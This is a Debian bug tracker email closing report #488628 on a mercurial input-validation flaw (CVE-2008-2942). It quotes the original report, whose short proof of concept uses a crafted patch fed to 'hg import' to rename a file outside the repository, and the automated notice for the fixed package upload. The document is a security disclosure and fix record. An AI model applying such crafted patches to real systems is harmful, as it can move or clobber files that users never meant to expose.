Your message dated Tue, 01 Jul 2008 17:17:10 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#488628: fixed in mercurial 1.0.1-2
has caused the Debian Bug report #488628,
regarding mercurial: CVE-2008-2942 Insufficient input validation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
488628: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=488628
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi
It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.
Proof of concept:
echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux
The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.
Cheers
Steffen
[0]: http://www.selenic.com/hg/rev/87c704ac92d4
--- End Message ---
--- Begin Message ---
Source: mercurial
Source-Version: 1.0.1-2
We believe that the bug you reported is fixed in the latest version of
mercurial, which is due to be installed in the Debian FTP archive:
mercurial-common_1.0.1-2_all.deb
to pool/main/m/mercurial/mercurial-common_1.0.1-2_all.deb
mercurial_1.0.1-2.diff.gz
to pool/main/m/mercurial/mercurial_1.0.1-2.diff.gz
mercurial_1.0.1-2.dsc
to pool/main/m/mercurial/mercurial_1.0.1-2.dsc
mercurial_1.0.1-2_i386.deb
to pool/main/m/mercurial/mercurial_1.0.1-2_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Vincent Danjean <[EMAIL PROTECTED]> (supplier of updated mercurial package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Tue, 01 Jul 2008 18:44:19 +0200
Source: mercurial
Binary: mercurial mercurial-common
Architecture: all i386 source
Version: 1.0.1-2
Distribution: unstable
Urgency: high
Maintainer: Python Applications Packaging Team <[EMAIL PROTECTED]>
Changed-By: Vincent Danjean <[EMAIL PROTECTED]>
Closes: 488628
Description:
mercurial-common - Scalable distributed version control system (Common files)
mercurial - Scalable distributed version control system
Changes:
mercurial (1.0.1-2) unstable; urgency=high
.
* Backport from upstream: fix CVE-2008-2942 Insufficient input validation
(Closes: #488628)
Checksums-Sha1:
15dd2a0b24430f10282dd7250f4d569f9ba53896 473590
mercurial-common_1.0.1-2_all.deb
358c77522f811c98011c9ed48db704deb0715898 24446 mercurial_1.0.1-2.diff.gz
a690c4277429629815a02372f5ba79f76584679d 87662 mercurial_1.0.1-2_i386.deb
dbe4c192538ef2292be5f34764936c8fb192f4e5 1408 mercurial_1.0.1-2.dsc
Checksums-Sha256:
0f2c7db6dc74465caf73f585837a453a6c13a8b083963737413bcc9f75321c8a 87662
mercurial_1.0.1-2_i386.deb
abe5fdc94b5037acdae4fb5282577980a8955143ad64543a1c7ed787fadeafd5 473590
mercurial-common_1.0.1-2_all.deb
ddcf55cc023497968800e8e57d72c0e588dff84346befd135bf9c16e89da57e2 1408
mercurial_1.0.1-2.dsc
eac44d71cfcd6506033b420ecbec87648f649784e35072ca57ca9e5c2a14788c 24446
mercurial_1.0.1-2.diff.gz
Files:
592377138367f9e5cb63780329ecf699 87662 devel optional
mercurial_1.0.1-2_i386.deb
90cce5e1bd6b1fc0a312a6edddf7bba7 473590 devel optional
mercurial-common_1.0.1-2_all.deb
d250275bede624e89b9d2b73bcf8b0ef 24446 devel optional mercurial_1.0.1-2.diff.gz
eae9ac0a5e50c59dda514b9a46fc708b 1408 devel optional mercurial_1.0.1-2.dsc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIamPrC/d4Z50CXocRAoH3AKCDg2DcVK4r1hfnIYgdXYddrqsdeACgjFP1
Zcng3zNFnYpM0LbqDPNiVZE=
=x6AY
-----END PGP SIGNATURE-----
--- End Message ---
